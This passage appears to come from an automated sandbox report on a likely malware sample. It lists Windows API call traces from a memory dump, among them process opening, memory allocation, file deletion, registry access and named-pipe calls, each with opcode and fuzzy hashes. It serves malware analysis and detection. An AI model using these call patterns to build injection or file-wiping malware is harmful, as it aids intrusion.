                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4724
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4756
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB4788
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB47BA
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB47EC
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB481E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000), ref: 04BB48C5
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB48F0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,04BCC1E4,04BC05A4,04BCC1E4,00000000,?,?,04BB22F6), ref: 04BAD845
                                                            • GetLastError.KERNEL32(?,04BCC1E4,04BC05A4,04BCC1E4,00000000,?,?,04BB22F6), ref: 04BAD853
                                                            • NtSetInformationProcess.NTDLL ref: 04BAD8AD
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04BAD8EC
                                                            • GetProcAddress.KERNEL32(?), ref: 04BAD90D
                                                            • TerminateThread.KERNEL32(?,00000000,04BB22F6,00000004,00000000), ref: 04BAD964
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD97A
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD9A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                            • String ID:
                                                            • API String ID: 3529370251-0
                                                            • Opcode ID: dd3c9f8f4d1b45bb66f814949e1319d9ac978b95f05d14bbdaa4936a71f62974
                                                            • Instruction ID: cdf78d11f7a5d23627a4f549f5d53c16f2c2e0d692b3f830f7b18409d160fef2
                                                            • Opcode Fuzzy Hash: dd3c9f8f4d1b45bb66f814949e1319d9ac978b95f05d14bbdaa4936a71f62974
                                                            • Instruction Fuzzy Hash: 95417D70608345AFDB10DF25C884A1EBBF9FB98348F00096AF595A2160D774EA68CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,04BA114F,?), ref: 04BA2B66
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BA2B83
                                                            • FreeLibrary.KERNEL32(?), ref: 04BBCD80
                                                              • Part of subcall function 04BB7E67: lstrlenW.KERNEL32(?,00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7E74
                                                              • Part of subcall function 04BB7E67: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04BBCCC5,?,?), ref: 04BB7E9D
                                                              • Part of subcall function 04BB7E67: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04BB7EBD
                                                              • Part of subcall function 04BB7E67: lstrcpyW.KERNEL32(-00000002,?), ref: 04BB7ED8
                                                              • Part of subcall function 04BB7E67: SetCurrentDirectoryW.KERNEL32(?,?,?,?,04BBCCC5,?,?), ref: 04BB7EE4
                                                              • Part of subcall function 04BB7E67: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,04BBCCC5,?,?), ref: 04BB7EE7
                                                              • Part of subcall function 04BB7E67: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7EF3
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F10
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F2A
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F40
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F56
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F6C
                                                              • Part of subcall function 04BB7E67: GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F82
                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 04BBCCD6
                                                            • lstrlenW.KERNEL32(?), ref: 04BBCCF2
                                                            • lstrlenW.KERNEL32(?), ref: 04BBCD0A
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BBCD23
                                                            • lstrcpyW.KERNEL32(00000002), ref: 04BBCD38
                                                              • Part of subcall function 04BC100F: lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC101F
                                                              • Part of subcall function 04BC100F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC1041
                                                              • Part of subcall function 04BC100F: lstrcpyW.KERNEL32(00000000,00000000), ref: 04BC106D
                                                              • Part of subcall function 04BC100F: lstrcatW.KERNEL32(00000000,?), ref: 04BC1080
                                                            • FindNextFileW.KERNEL32(?,00000010), ref: 04BBCD60
                                                            • FindClose.KERNEL32(00000002), ref: 04BBCD6E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                            • String ID:
                                                            • API String ID: 1209511739-0
                                                            • Opcode ID: af7c95bb4bd6d2270e842b3d2400c98827112edbfb4383111cf06418864b0e4c
                                                            • Instruction ID: 6745fe9bfc017e7abecfe3720ed05f93d4dfa4e1ed58bb66becb03ed988b81c3
                                                            • Opcode Fuzzy Hash: af7c95bb4bd6d2270e842b3d2400c98827112edbfb4383111cf06418864b0e4c
                                                            • Instruction Fuzzy Hash: 0E416A714083069BDB11DF24D884A6FBFF8FF88705F04496EF994A2150DB74E919EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 04BB19A7
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04BB1A10
                                                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04BB1A38
                                                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04BB1A8A
                                                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04BB1A95
                                                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04BB1AA8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                            • String ID:
                                                            • API String ID: 499515686-0
                                                            • Opcode ID: 55542defdd3b1a06fba0156ec8fb513ce805d129cd37b032ac5bc0a4998c4cbb
                                                            • Instruction ID: a08008a1a1b64fd9c43c79314f538b57932ba24e7ce72db6d9e862e9a04e69fd
                                                            • Opcode Fuzzy Hash: 55542defdd3b1a06fba0156ec8fb513ce805d129cd37b032ac5bc0a4998c4cbb
                                                            • Instruction Fuzzy Hash: 9F415F71900209EFDF10EFA8CC94AFE7BB9FF04384F5481A9E851A6050D7B4AB51DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC376E
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC38A2
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC38B7
                                                            • memcpy.NTDLL(?,00008F12,0000011E), ref: 04BBC679
                                                            • memset.NTDLL ref: 04BBC6AF
                                                            • memset.NTDLL ref: 04BBC6FD
                                                            • memset.NTDLL ref: 04BBC77C
                                                            • memset.NTDLL ref: 04BBC7EB
                                                            • memset.NTDLL ref: 04BBC8BB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: 612c5f90b059356375bd2acd7ae65c426e753bdc294a7d2a4465a8e7fa69bc19
                                                            • Instruction ID: fa8819f8f994c0050c8c5bc440167d2a0679971de93f111220d86291b4424665
                                                            • Opcode Fuzzy Hash: 612c5f90b059356375bd2acd7ae65c426e753bdc294a7d2a4465a8e7fa69bc19
                                                            • Instruction Fuzzy Hash: 7DF1DC30600B898FDB31CF69C9946FABBF0FB92304F144DADC5D696681D2B1BA45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04BB3716
                                                            • lstrlenW.KERNEL32(?), ref: 04BB3724
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04BB374F
                                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 04BB377C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Query$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3961825720-0
                                                            • Opcode ID: ff8f9279942ed68d1eea02ebed5a64259a6b6727ea6a6dde37b24d01568e7e32
                                                            • Instruction ID: 4ac9c58887497cee9f6808be23221ddfcc2bd3ca1330fd5419be73dc7488dad7
                                                            • Opcode Fuzzy Hash: ff8f9279942ed68d1eea02ebed5a64259a6b6727ea6a6dde37b24d01568e7e32
                                                            • Instruction Fuzzy Hash: 6E410BB1500209FFEB11CFA9C9C4EAEBBB8EF04314F1451A9ED45A6150D7B5EA119BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BA4873
                                                              • Part of subcall function 04BA4173: NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                              • Part of subcall function 04BA4173: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                              • Part of subcall function 04BA4173: SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04BA4983
                                                              • Part of subcall function 04BB9180: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BB9198
                                                            • memcpy.NTDLL(00000218,04BC4EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 04BA4902
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA495C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2966525677-0
                                                            • Opcode ID: f483e557f68ac74220d686c56100cf99801a92e244368ca68ccb01652d4636ee
                                                            • Instruction ID: e633821edd2164c66dd1b3b665bd2a822f8fc0c45bfb09835b1e55223d4ca5d5
                                                            • Opcode Fuzzy Hash: f483e557f68ac74220d686c56100cf99801a92e244368ca68ccb01652d4636ee
                                                            • Instruction Fuzzy Hash: 1B317371905309EFDB20DF64D989AAAF7F8EB18344F1045AAE545E7240E7B0FE64CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 04BB61AF
                                                            • GetTickCount.KERNEL32 ref: 04BB61C9
                                                            • wsprintfA.USER32 ref: 04BB621C
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04BB6228
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 04BB6233
                                                            • _aulldiv.NTDLL(?,?,?,?), ref: 04BB6249
                                                            • wsprintfA.USER32 ref: 04BB625F
                                                            • wsprintfA.USER32 ref: 04BB627D
                                                            • wsprintfA.USER32 ref: 04BB6294
                                                            • wsprintfA.USER32 ref: 04BB62B5
                                                            • wsprintfA.USER32 ref: 04BB62F0
                                                            • wsprintfA.USER32 ref: 04BB6314
                                                            • lstrcat.KERNEL32(?,?), ref: 04BB634C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BB6366
                                                            • GetTickCount.KERNEL32 ref: 04BB6376
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BB638A
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BB63A8
                                                            • StrTrimA.SHLWAPI(00000000,04BC63D8,00000000,05C8B188), ref: 04BB63DD
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB63FD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BB6408
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 04BB640C
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 04BB648D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BB649C
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,05C8B188), ref: 04BB64AB
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB64BD
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB64CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2878544442-3347341033
                                                            • Opcode ID: de5bc5d48d3022eca0c8b69f535b3d0ef1cf44a45f4d283f8a065cdf065bc3ec
                                                            • Instruction ID: 45f20592997b46c8d0e43ff2a8e75d48b35b8a40e56c2935b11314b7478791d8
                                                            • Opcode Fuzzy Hash: de5bc5d48d3022eca0c8b69f535b3d0ef1cf44a45f4d283f8a065cdf065bc3ec
                                                            • Instruction Fuzzy Hash: D0A15671504209EFDB01DFA9ECC5EAA7BE9EB4C304F044466F948D7251DA78EC248FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 04BC05ED
                                                            • wsprintfA.USER32 ref: 04BC0652
                                                            • wsprintfA.USER32 ref: 04BC0698
                                                            • wsprintfA.USER32 ref: 04BC06B9
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BC06F0
                                                            • wsprintfA.USER32 ref: 04BC070C
                                                            • wsprintfA.USER32 ref: 04BC0722
                                                            • wsprintfA.USER32 ref: 04BC0742
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BC075F
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC0780
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC079A
                                                              • Part of subcall function 04BB7DB7: lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DE2
                                                              • Part of subcall function 04BB7DB7: lstrlen.KERNEL32(?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DEA
                                                              • Part of subcall function 04BB7DB7: strcpy.NTDLL ref: 04BB7E01
                                                              • Part of subcall function 04BB7DB7: lstrcat.KERNEL32(00000000,?), ref: 04BB7E0C
                                                              • Part of subcall function 04BB7DB7: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7E29
                                                            • StrTrimA.SHLWAPI(00000000,04BC63D8,00000000,05C8B188), ref: 04BC07CC
                                                              • Part of subcall function 04BA95DD: lstrlen.KERNEL32(05C89986,00000000,73BB81D0,00000000,04BB63E9,00000000), ref: 04BA95ED
                                                              • Part of subcall function 04BA95DD: lstrlen.KERNEL32(?), ref: 04BA95F5
                                                              • Part of subcall function 04BA95DD: lstrcpy.KERNEL32(00000000,05C89986), ref: 04BA9609
                                                              • Part of subcall function 04BA95DD: lstrcat.KERNEL32(00000000,?), ref: 04BA9614
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 04BC07F0
                                                            • lstrcat.KERNEL32(?,?), ref: 04BC07FE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 04BC0805
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC0810
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC082C
                                                              • Part of subcall function 04BBBE8F: memcpy.NTDLL(?,04BB5AB0,00000010,?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001), ref: 04BBBEE0
                                                              • Part of subcall function 04BBBE8F: memcpy.NTDLL(00000000,00000001,04BB5AB0,0000011F), ref: 04BBBF73
                                                            • HeapFree.KERNEL32(00000000,?,00000001,05C8B188,?,?,?), ref: 04BC08FA
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BC0909
                                                            • HeapFree.KERNEL32(00000000,?,00000000,05C8B188), ref: 04BC091B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC092D
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC093C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2173832509-3347341033
                                                            • Opcode ID: fada655f61804e112a89b15aaa4f4008b6ec8c7dfa999b00c5e6c49823ff887b
                                                            • Instruction ID: 07b39ff4fa8f4a04921a9f83a8b1f99093937ce7aa3854ef9b069df5f61b34a3
                                                            • Opcode Fuzzy Hash: fada655f61804e112a89b15aaa4f4008b6ec8c7dfa999b00c5e6c49823ff887b
                                                            • Instruction Fuzzy Hash: 55A15771508209EFDB01EFA8ECC4E5A7BE8EB8C304F05456AF558E7260D778ED158BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?), ref: 04BA1015
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                              • Part of subcall function 04BC0BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BC0D1B
                                                              • Part of subcall function 04BC0BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04BC0D50
                                                              • Part of subcall function 04BC0BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04BC0D6C
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0D85
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0D97
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0DAC
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0DC0
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0DE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04BA1071
                                                            • memcpy.NTDLL(00000000,?,00000000), ref: 04BA1084
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BA109B
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0E58
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0E6A
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0E85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04BA10C6
                                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04BA10DE
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BA1138
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 04BA115B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BA116D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04BA11E1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA11F1
                                                              • Part of subcall function 04BB4B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04BA1211,?), ref: 04BB4B72
                                                              • Part of subcall function 04BB4B63: mbstowcs.NTDLL ref: 04BB4B8E
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04BA121A
                                                            • lstrlenW.KERNEL32(04BCD8B0,?), ref: 04BA1294
                                                            • DeleteFileW.KERNEL32(?,?), ref: 04BA12C2
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA12D0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA12F1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                            • String ID:
                                                            • API String ID: 72361108-0
                                                            • Opcode ID: be6c0e17e9e2603e7a78636f98566d5a8aad775c976d647b253cc281c4aad32a
                                                            • Instruction ID: 7ea9b98a03b476dedf76ba7e5c2e65c119508ebb96fd5231234d98a5f9aa7227
                                                            • Opcode Fuzzy Hash: be6c0e17e9e2603e7a78636f98566d5a8aad775c976d647b253cc281c4aad32a
                                                            • Instruction Fuzzy Hash: 6891277590021EEFDB10DFA5DCC8CAA7BBCEB49348B098066B609D7252D634E958CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB6504
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB6521
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04BB6571
                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04BB657B
                                                            • GetLastError.KERNEL32 ref: 04BB6585
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB6596
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04BB65B8
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB65EF
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB6603
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04BB660C
                                                            • SuspendThread.KERNEL32(?), ref: 04BB661B
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000), ref: 04BB662F
                                                            • SetEvent.KERNEL32(00000000), ref: 04BB663C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB6643
                                                            • Sleep.KERNEL32(000001F4), ref: 04BB6656
                                                            • ResumeThread.KERNEL32(?), ref: 04BB667A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                            • String ID:
                                                            • API String ID: 1011176505-0
                                                            • Opcode ID: 62f7b4283c6ee0ae2622d031d0d033029ae97fa3e52baeea601bf91a98d5b164
                                                            • Instruction ID: 96b6f6c80a76eaf92caf603de9196bfac8ed117bdf7e0747b71a8209d78a02a8
                                                            • Opcode Fuzzy Hash: 62f7b4283c6ee0ae2622d031d0d033029ae97fa3e52baeea601bf91a98d5b164
                                                            • Instruction Fuzzy Hash: 28411F71900109EFDB109FA4ECC8DBDBBB9FB18305B1480AAF546E3114D775AEA1CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,73BCF710,00000000,00000000), ref: 04BC34FA
                                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04BC3518
                                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04BB2FCF), ref: 04BC3546
                                                            • HeapFree.KERNEL32(00000000,04BC63D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,04BC63D8,00000002,?,?), ref: 04BC35BA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BC367D
                                                            • wsprintfA.USER32 ref: 04BC3698
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC36A3
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC36BA
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,04BC63D8,00000002,?), ref: 04BC36DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BC36F7
                                                            • wsprintfA.USER32 ref: 04BC370E
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC3719
                                                              • Part of subcall function 04BAA6F7: lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                              • Part of subcall function 04BAA6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                              • Part of subcall function 04BAA6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                              • Part of subcall function 04BAA6F7: GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                              • Part of subcall function 04BAA6F7: HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC3730
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,04BC63D8,00000002,?,?), ref: 04BC3740
                                                            Memory Dump Source
